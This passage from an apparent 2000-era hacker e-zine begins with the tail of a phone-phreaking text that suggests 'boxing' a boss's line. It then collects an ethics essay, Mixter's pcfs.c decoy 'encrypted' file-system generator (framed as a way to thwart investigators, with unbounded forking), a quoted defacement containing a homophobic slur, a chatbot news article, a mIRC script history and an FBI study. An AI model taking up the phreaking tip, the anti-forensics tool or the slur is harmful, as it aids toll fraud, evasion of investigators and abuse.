bosses) and call them from that. Or you could box the bosses house if you know where he/she lives. This is only the first version of this text. I will be releasing more tips and tricks of the trade. This maybe a short text but it is a lot more informative than the other ones out there. Anything to add or change? Send it to tekneke@geeks404.com. __________________________________________________ Do You Yahoo!? Get Yahoo! Mail - Free email you can access from anywhere! http://mail.yahoo.com/ 314.0 [IBT] Ethics & The Underground, What the hell happened? - Gh0zt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By: Gh0zT When I first came onto the scene in '95, I found the underground scene to be quite hospitable. People I met were friendly, and if you said something out of place it was merely looked down upon. Today things have made a drastic change for the worst; the scene has become a war zone if you will. There are crackers, script kiddies, hackers, warez pups, groupies (a.k.a. scene whores) and just plain old idiots that I don’t like to stereotype, but unfortunately that is the way it is. Never have I seen such chaos in the scene, the long held traditions of ethics and netiquette have basically been forgotten or were never learned by the newer generation. Many people have tried to explain why this has happened, but personally I think the blame falls on veteran hackers that have not lent a hand to up and coming newbies when they asked for help. So, over time the newbies became script kiddies by learning to hack the easiest way they could--by simply running a script or program that someone else wrote. And over time, after being rejected by legitimate hackers they developed a serious attitude. The second part of the blame also falls on the media. They have brought a sub-culture that was meant to be just that, a sub-culture, to the mainstream, and to the attention of the public. Our ranks have swollen since high profile hacks started reaching the 10 o'clock news and movies started having technical themes. One movie I think we all can remember is "Hackers." Even though the story line was totally false, it made thousands of eager kids join the scene with handles such as "Zero Cool" and "Lord Nikon." Another very apparent reason for the swell in our ranks has been because of media interviews. Alot of big name hackers who have gone commercial and now call themselves White Hat Hackers; in other words a hacker for hire. I have nothing against these people because they are doing what they love and getting paid a lot of money for it. However, sometimes they seem to forget that each of us at one time was a neophyte and NONE of us were born with a nix manual. Sometimes they need to stop for a second and actually befriend someone who is having trouble. That, in my humble opinion, is a part of the reason for the decline in ethics. The other is a lack of role models. Yes, some hackers such as the world renowned Cult of the Dead Cow have remained in touch with their peers but other groups have not and don't want anything to do with newbies. The motto of these people is "Read the Fucking Manual." I have news for all of those types of people: the person you just blew off might have had experience in another area such as programming, or some other kind of knowledge that you yourself are lacking, but they just need that little boost to help them out a bit. The worst part is you will never know and you might have hampered your own growth by blowing them off. Almost everyday I hear about web site defacements, the media describing ALL hackers as criminal, comparing us to common thugs, although this is not true. One thing we all have to remember about people is this: if they don't understand a culture they will be biased against it, that is true. It is kind of the same when the general public thinks of a hacker as a nerdy white guy who is pale as paper and sits in a room all night trying to get their credit card numbers. No one thinks that anybody on the street could be a hacker. I can remember once I had not gotten a hair cut nor had I shaved for four months. This was due to a lack of time and laziness. One day I met someone at work who was asking a question about computers. I responded with the answer he needed and he looked at me strangely, as if he had seen a ghost. It was incomprehensible to him that I posessed computer knowledge, and when I asked him, "Why the strange look?", he responded that he didn’t think I even had a computer, much less how to turn one on. There has been so much stereotyping that normal people just don’t think that the person working next to them or even the garbage man could be a hacker, or even involved in the computer underground. The truth of the matter is, although a large majority is white, there are plenty of minorities actively involved in the scene. If you’re like me, then you are sick of hearing about kids nuking some sixty-year-old grandmother offline because she simply stated a religious viewpoint, or waking up and hearing about some 15 year old "hacker" because he cracked his school network and changed his grades… Now is the time to start setting examples for both neophytes and script kiddies alike, because they are our future and without ethics the scene will become what the media is making it out to be. Generally I always try to help people when I can. If someone asks a question just try to have patience and help them out, even if it is a "how do I hack my girlfriend's hotmail account" type of question. Do not simply tell them to go fuck themselves, just give them an appropriate answer and/or suggest a better course of action. One major thing that is getting a lot of people in trouble is the fact that some of us do not know when to stop bragging and when to shut up. If you didn’t know, that is one of the biggest ways people in the scene get busted, by agents posing as fellow scene members. When you are on a chat service, remember to treat people like you want to be treated, because it leaves a lasting impression on people. So just think next time you go into a chat room. Someone who you might meet later in life could be there, and you might turn him or her off to helping newbies. If you see someone such as a "groupie" (a.k.a. scene whore), make sure you turn a kind cheek and remember not to get down with them, because it could lead to your downfall. Scene whores make other women look bad, because if a female is legitimately trying to get in to the computer security scene, then they make it harder because their male counterparts don’t respect them as much as other males. So, in other words, just treat females equally even if they are whores. Those are my opinions, and they are just that, opinions. I also hope that I made people think and form their own opinions. That was what I was aiming for, but in truth I have to say, "Wake Up." We are getting more and more restrictions slapped on us and we are just taking it. There needs to be a unified underground to help each other out when we need it. But like I said, this is only my opinion. I also must commend Carole Fennelly on her response to an article that was published on HNN about scene whores. @HWA 315.0 [IND] PCFS.C by Mixter ~~~~~~~~~~~~~~~~~~~~~~ This is totally cool, check it out, another gem from Mixter. - Ed home:http://mixter.void.ru email:mixter@newyorkoffice.com /* * pcfs - pseudo cryptographic file system * (c) 2000 by Mixter * * This tool just creates a recursive directory and file structure * that contains purely random data, but is indistinguishable from a * encrypted CFS directory, unless an extensive cryptanalysis is performed. * This can be taken as a proof that a strange directory cannot easily be * proven to actually contain encrypted data. May be useful against f3dz, * just for decoy purposes, or to keep people from analyzing your * cryptographic file systems structure. Distributed according to the GPL. * * WARNING: THIS PROGRAM IS SUBJECT TO PSEUDO-CRYPTOGRAPHIC EXPORT * CONTROLS AND US-RESTRICTIONS AGAINST RANDOM DATA! =P * This code was reviewed and approved by the SCC (sloppy code commission) * gcc -Wall -O2 pcfs.c -o pcfs */ #include #include #include #include #include #include #include #include #include #define START_PATH "fake" mode_t modes[7] = {00755, 00644, 0000, 00664, 00700, 00777, 00444}; char chr[16] = "abcdef1234567890", rseed[65535], buffer[256]; char wd[200]; int rcounter = 0; void random_init (void); inline long gr (int, int); char *rname (void); mode_t rmode (void); void mkfiles (void); void mkd (char *, int); int main (void) { printf ("Creating fake file system in %s/%s, press a key\n", getcwd (wd, 200), START_PATH); (void) getchar (); printf ("Hit CTRL+C to stop - creating files"); if (!geteuid ()) setpriority (PRIO_PROCESS, 0, -10); mkd (START_PATH, 0); return 0; } void mkd (char *dirname, int forking) { printf ("."); fflush (stdout); if (forking) if (fork ()) return; mkdir (dirname, rmode ()); getcwd (wd, 200); strcat (wd, "/"); strcat (wd, dirname); chdir (wd); if (forking) mkfiles (); else { char smbuf[32]; int a, f = open ("/dev/urandom", O_RDONLY); read (f, smbuf, 32); a = open ("...", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* hash */ write (a, smbuf, gr (5, 10)); close (a); sprintf (smbuf, "%ld", gr (1, 5)); a = open ("..c", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* algorithm */ write (a, smbuf, strlen(smbuf)); close (a); read (f, smbuf, 32); a = open ("..k", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* encrypted key */ write (a, smbuf, 32); close (a); close (f); sprintf (smbuf, "%ld", gr (1000, 900000)); a = open ("..s", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* session blah */ write (a, smbuf, strlen(smbuf)); close (a); while (1) mkfiles (); } } void mkfiles (void) { while (gr (0, 25)) if (!gr (0, 10)) mkd (rname (), 1); else { int f = open ("/dev/urandom", O_RDONLY), x, y = gr (0, 65500); char fname[256], fn2[256], big[65535]; memset (fname, 0, 256); memset (fn2, 0, 256); sprintf (fname, "%s", rname ()); sprintf (fn2, ".pvect_%s", rname ()); symlink (fname, fn2); x = open (fname, O_RDWR | O_CREAT, rmode()); read (f, big, y); write (x, big, y); close (f); close (x); } } char * rname (void) { int i; memset (buffer, 0, 256); for (i = 0; i < gr (5, 150); i++) buffer[i] = chr[gr (0, 15)]; return buffer; } mode_t rmode (void) { return (modes[gr (0, 6)]); } void random_init (void) { int rfd = open ("/dev/urandom", O_RDONLY); if (rfd < 0) rfd = open ("/dev/random", O_RDONLY); rcounter = read (rfd, rseed, 65535); close (rfd); } inline long gr (int min, int max) { if (rcounter < 2) random_init (); srand (rseed[rcounter] + (rseed[rcounter - 1] << 8)); rcounter -= 2; return ((random () % (int) (((max) + 1) - (min))) + (min)); } @HWA 316.0 [IND] The hypocracy runs rampant prizm mr anti-defacement himself defaces? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ When I knew prizm he was VERY anti-web defacement, and anti-script kiddy, i'm not sure if this was really done by him but it does fit his attitude and way of speaking...also b0f security has not existed for months now not to mention he quit several times and was VERY quit last we spoke... Aug 10th 2000 link:Attrition http://www.attrition.org/mirror/attrition/2000/08/10/www.mothermadetoys.com/ /title/ sure, you can do it //title/ hacked by prizm of b0f security. I hacked this server to say that attrition.org are a bunch of hypocrit faggots for hosting their defacement archieve, yet they dont condone defacements. They say that script kiddies are stupid for running around defacing all these random servers, yet, they host a defacement archive that 90% of media organizations visit to keep tabs on hacks. What it seems like to me is that the attrition crew are nothing but a bunch of lame media whores that want to get their 15 minutes of fame in this huge media surge from the media about hackers and hacking. Also, doesn't it seem kinda odd that some of the attrition crew are "security consultants" and host a defacement mirror? What a better way to cash in huh? Host a defacement mirror, send e-mails out to the hacked machines and offer your services. They say they dont, but they also said they werent HFG, but everyone knows they were. They ever missed a HFG hack did they? Nope. Attrition.org is nothing more than antionline.com with a defacement mirror. It's all about the media. All those RDS kiddies running around rds'ing their way into any and everything they can find and hosting their hacks are a great way to get that media to come isn't it? A great way to get work. I'm gonna send this to attrition.org to see if they will mirror something that talks shit about them. The problably will edit this defacement like they do most of the others. I guess we'll see. Additional: remnant members of b0f (some not all) including Slash the founder merged with HWA Security, hence the news worthiness of this item. @HWA 317.0 [MM] Do you have an imaginary friend? no? are you sure?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By TrdOnjuan http://www.abcnews.go.com/sections/tech/DailyNews/aoliza000829.html Imaginary Friends Electronic Chatter Fools Instant Messengers Some Instant Messengers have found Eliza, a 33-year-old in Berkeley, Calif. They think she's a relative, or they tell her painful stories about ex-girlfriends. But actually Eliza's a computer program. (aol.com) By Sascha Segan Aug. 29 Do you really know the person with whom you’re chatting online? Do you really know it is, in fact, a person? AOL Instant Messenger, a one-on-one online chat system, is a sea of conversations and failed attempts at contact, where millions of people each day reach out to talk to people they know or people they hope to know. Some find Eliza, a 33-year-old in Berkeley, Calif. They think she’s a relative, or they tell her painful stories about ex-girlfriends. The problem is, Eliza’s a computer program one of the simplest artificial intelligence programs around, and a lot of the people talking to Berkeley student Kevin Fox’s unattended Powerbook G3 don’t seem to notice (or maybe care.) They just want to connect with someone. Their minds are set to try and make sense of anything … to try to interpret anything as communication, Fox said. AOL isn’t pleased that naive users are mistaking Eliza for one of their own. AIM is diverse, it’s hip and it’s fun, which aren’t the words I’d use to describe a robot, said AOL spokesman Nicholas Graham. [Users] expect a real, live person to be behind the screen name. Enter AOLiza Fox has chronicled 31 human-Eliza interactions on his Web page, AOLiza, and he’s adding more regularly. A few of the correspondents seem to have figured out they’re talking to a program, but AOLiza has had extended, nonsensical conversations with people looking for information on lobster diving, offering porn or thinking it’s a relative of theirs. The truly weird thing is that Eliza is a very, very basic program, yet people keep chatting with it. Other than conversation prompters like I see and does talking about this bother you, the original 1966 Eliza mostly only parrots back comments, producing phrases like why do you tell me you were huh me nuts you gave her all the room she wanted never told nhewre what to do or where to go now? The fragmented, semi-incoherent style of speech and Eliza’s refusal to say goodbye suck in Instant Messaging conversationalists more than people in group chat rooms or e-mail, Fox said. The medium of IM is so new, and so coarse in general. You’re not talking in real sentences, like you are in e-mail, he said. And since IM conversations habitually end with a goodbye, Eliza’s habit of continually asking more questions can keep people chatting for hours, he said. People will talk to anything whether or not it talks back, said Steve Jones, head of the communications department at the University of Illinois at Chicago and a researcher into Internet communication. We talk to ourselves. We talk to our pets. We anthropomorphize anything, he said. Fox hasn’t told any of his correspondents, whose identities he keeps secret, that they were talking to a machine. He doesn’t want to embarrass them in front of others or spoil the fun. Nobody’s getting hurt unless they’re letting themselves get hurt. You can’t identify them at all, he said. Graham said AOL hasn’t received any complaints, but that they may take action against AOLiza if they do. Battle of the Bots This isn’t the first time machines have elbowed their way into Net chat, though it may be a first for AIM. Plenty of bots are resident on IRC, the Internet Relay Chat network where more technically-savvy chatters hang out. They serve as virtual bartenders, terrorists, even a game show host running a perpetual Jeopardy game. But most IRC bots announce themselves as such, and people are on the lookout for automata there, Fox said. Instant Messengers, often new Net users who got the program with their AOL accounts, may be a bit more naďve, he said. Mark Humphrys, a lecturer at Dublin City University in Ireland, ran a similar experiment on a chat network in 1989. His program, MGonz, used a lot more colloquial language than AOLiza and ended up squeezing an admission out of one boasting correspondent that no, he actually hadn’t had sex in the previous 24 hours. AOLiza and MGonz aren’t trying to pass the Turing test, the holy grail of artificial intelligence. That test, devised in 1950 by computer pioneer Alan Turing, would require a computer smart enough to be indistinguishable from a competing human while talking on any topic. Nobody’s yet won the $100,000 Loebner prize, offered since 1990 by New York philanthropist Hugh Loebner, for a program that passes the Turing test, though competitions have been held every year. Rather, AOLiza plays on people’s need to make sense out of nonsense, Fox said. Chatters don’t want to think there’s nobody out there, Humphrys said even if their interlocutor seems to repeat himself a lot and sound oddly robotic. The theory he formed to explain that was, ‘do you have all of these sayings on command [keys]?’ Obviously, he couldn’t make the leap to think there was nobody at home whatsoever, Humphrys said. Fox has changed AOLiza’s address on IM and is considering updating the software. So beware if you decide to chat up a stranger on the Net, she may not be who you think she is. In fact, she may not be anyone at all. Talking With AOLiza This is an excerpt of one of the conversations with AOLiza posted on Kevin Fox’s Web site. AOLiza: tell me more about that. human: about what AOLiza: what do you think? human: therers nothing to tell she us3ed me then got tired of me said i wasnt her type anymore i was possesive and controlling AOLiza: perhaps i already know you were possesive and controlling. human: i was huh you nuts i gave her all the room she wanted never told nhewre what to do or where to go AOLiza: why do you tell me you were huh me nuts you gave her all the room she wanted never told nhewre what to do or where to go now? human: what AOLiza: have you asked such questions before? human: about what this isnt making any sense AOLiza: does that question interest you? human: she didnt love me never did i was just another guy AOLiza: why do you tell me you were just another guy now? human: what do you mean i though i meant something to her i though we where good together but i was duped by her she played me along,what part dont you understand AOLiza: were you really? human: i was nothing to her human: yes really AOLiza: i see. @HWA 318.0 [HWA] What ever happened to .... 7thSphere? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ History 7thsphere started in 1996 when cashmere began writing an mIRC script for protection against floods. soon after that, i became really interested in scripting, so i asked if i could help. together, we produced what became the most popular mIRC script ever. after 2 versions, cashmere went his seperate way, and venum joined me. His programming talents took 7thsphere to the next level. We have been featured in numerous newspaper articles, and even in the book "Maximum Security" which can be found in various computer stores, as well as in online stores. It was around this time that 7thsphere.com was born. Thanks to the generous contributions of many people around the world, we were able to purchase the domain name and pay for webhosting services. the domain became popular very quicky. soon it was the host to numerous sites relating to the 7thsphere mentality (including the warforge, which has now grown to epic proportions). Such sites as Slackers Inc, the HPVAC Shop, The List, and 7thsphereIRC were all developed by myself to further 7thsphere.com's viability. The domain was soon receiving over three thousand hits per day. At one point, our webhosting provider informed me that we were using half of their pipe just by ourselves (a full 10mbit). The growth continued for months, until our web hosting provider was bought up. We no longer fit into the new companys "Acceptable useage policy". Finding another company that would provide the services as our old one was an impossible task. That is what lead to the downfall of 7thsphere.com. At the time of 7thsphere.com's closure, over 3 million hits, from every country with internet access in the world were created. Over 15,000 e-mails were received in this time as well. "What was started by a few kids reached people all over the planet. To this day, I still meet people who know 7thsphere.com or use the IRC script. I am amazed at our accomplishments, and thank everyone who helped from the bottom of my heart." - precursor A word from darkstarz Precursor, sphere and venum initially devised and authored the script about 3-4 years ago when it was fashionable to play games on ircii. After sphere 2 came out some of us began assisting precursor with financial assistance, legal assistance, web services, etc. Sphere was designed in addition to being one of the most advanced scripts for mirc, for taking over channels during a desynching of servers and protecting oneself from dos attackes. Some of the programs which were used as defensive measures also had offensive capabilities. Other additions included an fserver built in and other secondary programs not found in mirc scripts. Rhad assisted with writing many programs for windows which were initially and subsequently included. Precursor and I used to hang out in #anarchy on undernet which was initially the home channel for 7thsphere. Many members of #anarchy began to resent the intrusions by people requesting help with fundamentals in the installation and maintenance of sphere. As a result, Precursor and I started the #7thsphere channel on undernet to help persons with sphere problems. At first only precursor and I were in the channel as regulars but we were soon joined by warblade and militant. Others later came in offering assistance. 7thpsphere ver 3.0 was perhaps the most advanced and technologically efficient script available for over a year. It was primarily the product of Precursor made with the assistance of persons too numerous to mention. About 18 months ago Precursor and I attempted to secure the assistance of others to produce version 4. About four people began work on the project but petty infighting and jealousies developed which resulted in a failure to fully develope the script but a beta version was distributed to some people for testing. That version found its way to many desktops but was never completed. About six months ago I, with the advise and consent of Precursor, enlisted the help of esteem to embark upon the development of a continuation of version 4 but to be enhanced and improved which was to be called version 4.2. Esteem has been in charge of the development of the script since then with consultation of Precursor and I. It is expected that a new version, 4.2 should be released any day. Esteem should be consulted for a list of people he has recruited for email services, web development, etc. I have for the most part always supervised the product development and channel management of 7thsphere in conjunction with Precursor who is really the father of the script. Many of us have devoted considerable time, financial resources, etc. over a period of approximately five years. Many of the initial members of the organization have left but still appear in the user files. Neverend is presently the channel manager for #7thsphere and esteem is in charge of product development. Precursor and myself can still be found in #7thphere and #virii. -darkstarz As it would turn out the version 4.2 would never be released. In the early part of April, 2000 Esteem along with an accomplice took over #7thsphere for about 5 hours. This shocked many people. Such a turnabout was completed unexpected, but the tensions within the channel had been building. This was due in part to the pressures of following up on precursor's legendary script. The script was gone with esteem. However; this would not be the end. There would be a re-birth. -=- Latest on the Script 8-23-00 Well, it has been a long time since we last updated the general public on the script. We do tell people that come in our channel a lot about the script, but the majority of you would rather not. Some lucky people (non-members) on #7thsphere found themselves with a beta of the new script. Seems like the are enjoying it thoroughly. So, what can we tell you about the script... Right now we are testing a hex'd version of mIRC on several different operating systems trying to see if it is stable on all. We want to include a hex'd mIRC, but if it does not work on all, then nobody will see a hex'd mIRC released from 7thsphere. Dealing more with the script... right now, I (zmasterz) am mainly working on the issue of getting bugs out of the script. I am also stuck with rescripting some stuff I think can be coded better. supergate is coding all new stuff taking suggestions from everyone. So if you have a suggestion for the script stop in and see us. I am hoping to have the script out within two months. I am sorry about the huge delay, but we keep coming up with more ideas for the script. This is doing nothing but making it better, but also adding more time. Keep looking for our next update, where we will talk about the features of the script. Thanks, have a good one. - ZMASTERZ A Talk With Precursor 8-18-00 #7thsphere wasnt particularly active a couple of days ago, and I was preparing to idle away and get to work on the site. Then i saw a famialir nick join the channel. At one time conisdered the most famous person on IRC and a integral part of 7thsphere, precursor visits the channel occasionally preferring to keep to himself. I took this opportunity to interview him in hopes to perhaps introduce him to the newer members of the 7thsphere family. And to those who have know him here is a chance to take a closer, more personal peek behind the owner of the name 7thsphere. dr_trembl: So, after developing one of the best known scripts for mirc, it seems you slipped away, where have you been? precursor: That is a long question to answer.. I guess I slipped through the cracks about two years ago. But the story starts years before that. the reason 7thsphere progressed as it did was because I suffered from chronic fatigue syndrome and was home schooled. I didnt have the energy to do much besides computers. It lasted over 4 years. dr_trembl: Id heard of that precursor: However, a little over 2 years ago, I started to get better. I went back to school, and then graduated. That was the last time I was heavilly involved with 7thsphere. Since then, I have been going to college here in Buffalo NY, and working for a growing computer corporation. I have been with this company for almost 4 years now, and have grown to being a manager and in charge of about 10 other technicians. The company I work for contracts with one of the largest communications companies in the country, so it keeps me very busy :) dr_trembl: So you were able to network you're skills as a programmer into a career? precursor: It wasn't my skills as a programmer, I have never thought I was really that good. I believe what made 7thsphere good was its user friendlyness, and neat organization. I hate clutter, I like things to be "where they should". dr_trembl: So when you had gotten better, i guess you just needed to get out of the house? precursor: I needed to get back the life i lost :) dr_trembl: You had requested a link to fusion buffalo be featured on the site, thats a rave site. Have you been raving? precursor: i have been going to raves for almost 3 years :) dr_trembl: Definitely over the chronic fatigue, takes alot of energy to do that! precursor: I love electronic music, and I am big into the entire rave culture. I am also involved in the harm reduction movement that has received alot of media attention across the country with the use of ecstasy now being wide spread. dr_trembl: Do you plan to return to 7thsphere, in some capacity? precursor: Well, I would love to return to 7thsphere and do something usefull again. Its just a time factor, school, work, and a social life really eat into my persnal time. dr_trembl: I guess you've heard about the new script being written by zmasterz and a few other members? precursor: Yes, I have seen a few early beta versions as well. dr_trembl: Are you considering participating in developing the script? precursor: Honestly, I havent looked at mIRC scripting in 3 years or so, I dont remember much about it (although its still in my blood in someways :)). I would like to be more of a director type person, give comments and ideas to the programmers and see what they come up with. dr_trembl: Is there anything you'd like to say to someone reading this, lets say a new user who has only heard of you? precursor: Goto #7thsphere, its those people who have been doing it all for the past few years. There will be more from precursor, he will be on board for the next incarnation of our site! Ive seen the rough draft and believe me the next layout is gonna rock. 319.0 [IND] Study Shows: FBI Alienates Industry Security Experts ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.technologyevaluation.com/Research/ResearchHighlights/Security/2000/08/news_analysis/NA_ST_LPT_08_21_00_1.asp Study Shows: FBI Alienates Industry Security Experts L. Taylor - August 21, 2000 Page 1 of 6 Problem Fighting cybercrime is complex and time-consuming. One case can involve a multitude of computer systems, networks, and administrators, and requires the cooperation of all system owners, and sometimes many nations, in order to find the perpetrator. Due to their love of technology, their education, training, and experience, it is not uncommon for security industry professionals to be far more qualified and adept at resolving cybercrime than law enforcement. Though the FBI thrives on reaping assistance from industry security professionals, many industry security experts are reluctant to help the Federal law enforcement agency when it comes to cybercrime. Though it makes it a lot more difficult for the FBI to track cybercriminals without the help and cooperation of private industry, savvy security experts are not lining up to help. This lack of respect that industry professionals have for the FBI results in cases taking longer to crack, and many going unresolved. It also often leaves the Department of Justice looking like a three-ring circus. Study Shows: FBI Alienates Industry Security Experts L. Taylor - August 21, 2000 Page 2 of 6 Background Typically, when the FBI requests assistance from a security professional, the kind of assistance they require is extensive which is to be expected, given the circumstances. They need to understand the network topologies, the systems affected, the points of entry, and need to locate, collect, and analyze all the corresponding log files. All this data gathering and analysis takes time. Private industry exists in order to create revenue. In this burgeoning Internet economy, information technology resources are scarce. Inside of that IT circle, information security resources are still more scarce. Taking time out from daily security duties to assist the FBI in a case that may not have directly impacted their own company's bottom line can actually end up costing a company a significant amount of lost revenue. It's often more cost effective to tell law enforcement, "No, no logs on any of our systems that would be useful to you…" than spend hours, days, or weeks, combing through log files, systems, and backup tapes, only to hand them over to a law enforcement agency that in many cases does not know what to do with them. Unless log files have been subpoenaed, and therefore must be turned over as evidence, there is often no return on investment when a company spends hours combing through log files for data that may or may not be helpful or appreciated. It is not unusual for a company to charge $200 an hour for security consulting services. If a security consultant spends a whole day assisting an FBI agent, this can amount to $1600.00 a day in lost revenue for the consultant's employer. For a service provider, a day without a security engineer can also open them up to potential lawsuits, lost customers, and lost future revenue streams. In short, it costs companies exorbitant amounts of money to assist the FBI. Because companies allocate resources to assisting the FBI and other law enforcement agencies, they need to have this "free consulting" respected and rewarded. In the course of our study, we communicated with a wide-selection of industry security experts from around the country. Some of these experts are ex-FBI employees. In doing so, we would like to retell some of the experiences that have been communicated to us, and would like to share certain trends that we have identified that seem to hamper the cybercrime investigation process. Study Shows: FBI Alienates Industry Security Experts L. Taylor - August 21, 2000 Page 3 of 6 Why We Don't Help the FBI Case 1: A Security Director at a well-known Internet company was plagued with some serious domain hijacking problems. Domain hijacking is when someone who does not own the dot-com name takes it over through technical DNS manipulations, and uses it for their own, sometimes subversive, purposes. In essence, this is kidnapping a domain name. This Director spent a significant amount of time and resources identifying the perpetrator of the attacks, down to documenting the name, address, and phone number. This information was turned over to the FBI's Wasington, D.C. headquarters office to investigate. The Director justified the case by presenting a considerable amount of evidence that supported $2-3million worth of damages. The domain that was hijacked was a very well known and lucrative domain name. A week after the incident, the Director met with the FBI and submitted the initial report. In the next 9 months, the only thing he heard was that according to the FBI agents, the work the director's team had done saved the FBI several months of time. The information in the Incident Report submitted to the FBI included the suspect's name, address, parent's names, and almost everything required to obtain a timely prosecution. After nine months, someone from the FBI contacted the Director, asking him to re-submit the report, telling him that the report needed to be submitted in person. (The Director had submitted the report in person nine months earlier in the initial meeting.) The FBI agent said he would come to the Director's facility to pick up the report. The Director was waiting for the agent with yet another copy of this same Security Incident Report. When this FBI agent arrived, he already had the report in his hands (due to the in-person submission nine months earlier). He handed it to the Director, and then said, "Now I need you to give it back to me so I can testify that you submitted this report in person." The FBI agent handed the report that the Director had written nine months previously back to him, and instructed the Director to now give it back to the FBI agent. The FBI agent then thanked the Director and said that now the FBI could begin looking into the case. As of June 2000, the Director has still not heard anything back from the FBI. Questions that come to mind are the following: Why is the FBI not willing to receive reports from the public and private sector electronically? The likely reason is that they do not use strong encryption and therefore cannot adequately authenticate the original document owner. After spending an enormous amount of time and resources identifying the perpetrator, why was this Director not contacted for 9 months? Typically, professionals who take the time to submit detailed reports are interested in seeing a case come to closure. Was the case even investigated? Not to the Director's knowledge. Was the case documented in an Incident Tracking Database? Were charges pressed? Was anyone prosecuted? Not according to the Director. Is this perpetrator now hijacking other domain names? The Director has told TEC that he will not be taking the time to research and hand-over evidence to the FBI in future incidents. His perception is that, "The FBI is woefully under-equipped." In the IT world, things happen quickly - this includes engineering developments and security breaches. The IT sector cannot afford to play bureaucratic reporting games to the FBI that in the long run produce no results. The FBI needs to be digitally equipped to securely accept information sent to them electronically. A trend that we noticed in talking to information security experts is that the wheels of justice are very slow. Case 2: An Internet dot-org group (a non-profit Internet company) that was being managed by security experts was trying to assist the FBI in the February 9th, distributed denial of service attacks. They went through the trouble of putting up a private link, just for the purpose of providing information and evidence to the FBI. They provided the FBI with IRC chat logs, and names and contact information of people who had actually confessed to participating in the crime. The dot-org group said that the FBI chose to not even access the link with the details of the crime. Questions that come to mind are the following: Why did the FBI choose not to access the electronic evidence? Was the information entered into an Incident Response Database? Has the perpetrator been instigating new denial of service attacks? Looking at Cases 1 and 2, we may surmise that if evidence is not presented in person, the FBI is not interested in reviewing it. Study Shows: FBI Alienates Industry Security Experts L. Taylor - August 21, 2000 Page 4 of 6 Case 3: An Internet dot-org group identified multiple perpetrators of web-site defacement - digital graffiti. They presented this information to the FBI, and never heard anything back. Questions that come to mind are the following: Was the information entered into an Incident Response Database? Was the case even investigated? Has the perpetrator been defacing more web-sites? Case 4: A seasoned security professional became aware that his name was included on a database of "well-known hackers" that was later sold to the FBI by a competitor. The security professional has never engaged in unethical hacking activities, and feels that his name was libelously and inappropriately included in this database of "well-known hackers" for spiteful, competitive reasons. Since the FBI purchased this database that was established without verification, the security professional feels that the FBI in conjunction with the begrudging competitor, may have potentially damaged his professional reputation. In light of this transgression, the security professional is no longer interested in assisting the FBI. Questions that come to mind are the following: How can a professional find out if his/her name is being erroneously catalogued in an FBI database? What sort of verification processes does the FBI use when purchasing non-qualified information? What other kinds of non-qualified information of criminal activity does the FBI purchase? Case 5: A security expert spent an enormous amount of time doing forensic work and analysis in tracking down a well-publicized hacking incident. The information was reported to the FBI, only to have the FBI take credit for doing the expert analysis, while never paying a cent for consulting services. Case 6: A security contractor who was working for a federal agency had the website that he was administering defaced by a cyber vandal. Instead of helping him identify the perpetrator, the FBI questioned him for hours, suggesting that a colleague of his had participated in the incident. Although it was never proven, the FBI insisted there had been some sort of duplicity on the contractor's part, insinuating that he himself was somehow involved in the crime in question. The real perpetrator was never identified, and the security contractor no longer wants any association with the FBI. Case 7: A well-known ISP refuses to install the "Carnivore" surveillance tracking device citing implementation and administration issues. Questions that come to mind are the following: Why doesn't the FBI realize that asking one entity to invade the privacy of others does not usually build relationships or trust? Most ISPs have contractual privacy agreements with their customers that they must abide by. Installing a device such as the Carnivore would in many cases be a breach of customer contractual agreements. If the FBI wants an ISP to perform some sort of service for them, why are they not willing to become a legitimate paying customer and pay for implementation, administration, and overhead costs? Study Shows: FBI Alienates Industry Security Experts L. Taylor - August 21, 2000 Page 5 of 6 Inside the FBI One security professional told us that he found it easy to work with the FBI, but conceded that he did this by circumventing the bureaucratic processes and accessing resources through back doors at very high levels. He went on to say that the FBI's cybercrime task force is clearly under-equipped. The FBI does not always do a good job of "marketing" what it does well. Naturally, bad news always receives more attention in the press than good news. Our research has indicated that one thing that the FBI does well is investigate cyberpedophilia. Though many incidences of cyberpedophilia go unreported, of the cases that are reported, the FBI has an impressive track record of apprehending the perpetrators most of the time. Almost all cyberpedophilia arrests lead to people going to jail. The FBI (and U.S. Customs) prosecutions in this area have approximately a 99% success rate.[1] Keeping America's children safe is an initiative that an overwhelming majority of security professionals support and are often eager to help in this area. [1] Source: Parent's Guide to Protecting Your Children in Cyberspace, by Parry Aftab Study Shows: FBI Alienates Industry Security Experts L. Taylor - August 21, 2000 Page 6 of 6 Recommendations for Resolution If the FBI requires the assistance of private industry to conduct investigations, they should pay for it like everyone else. Providing free services to Federal agencies is not something that businesses are setup to do. Managing security incidents is a business. If the FBI needs to outsource, they should be paying for this service. If the FBI pays for the necessary IT services they require, they will likely see a resounding change in the willingness of information security professionals to assist them. The FBI does not manage incidents - they investigate and prosecute suspects that may cause such incidents. The FBI needs to start giving credit where it is due. If an industry professional does all the leg work in tracking down a cybercriminal for free, they should be credited appropriately for their expert analysis and the time they contribute. Begging others for clues, and then taking the technology credits for doing the expert analysis done by someone else does not go over well with industry professionals. Industry professionals who understand information security, also understand technology privacy implications more than most people. They are somewhat leery of involving government agencies in general due to the belief that in the future, true privacy will be available only for those with the privilege of a technology education. Lawmakers need to understand technology in order to regulate it. Most lawmakers and Federal agencies are to a large degree, technology illiterate. Knowledge helps one gain respect. Law enforcement needs to build productive relationships with America's IT security community to better increase their knowledge base. Our research indicates that the metropolitan FBI offices are fighting and managing cybercrime somewhat independently of each other, each having their own processes for investigations. These processes need to be standardized across all FBI offices in order for the FBI to become truly effective. Private industry needs to understand the investigation process in order to provide better assistance. A former employee of the FBI commented that the FBI cybercrime unit is surprisingly decentralized. On occasions, when private industry has proactively sought out the FBI for assistance, it has been reported that various FBI offices seem uninterested in assisting private industry - an attitude that has an off-putting effect. If an information security engineer has had a previous 